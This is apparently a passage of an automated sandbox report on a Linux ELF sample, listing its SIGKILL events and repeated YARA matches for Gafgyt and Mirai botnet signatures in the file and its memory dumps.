      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 2102, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 6215, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 6223, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6212)SIGKILL sent: pid: 6250, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6290)SIGKILL sent: pid: 6289, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6292)SIGKILL sent: pid: 6291, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6311)SIGKILL sent: pid: 1860, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6347)SIGKILL sent: pid: 6346, result: successfulJump to behavior
      Source: /tmp/x86_64.nn.elf (PID: 6352)SIGKILL sent: pid: 6351, result: successfulJump to behavior
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
      Source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
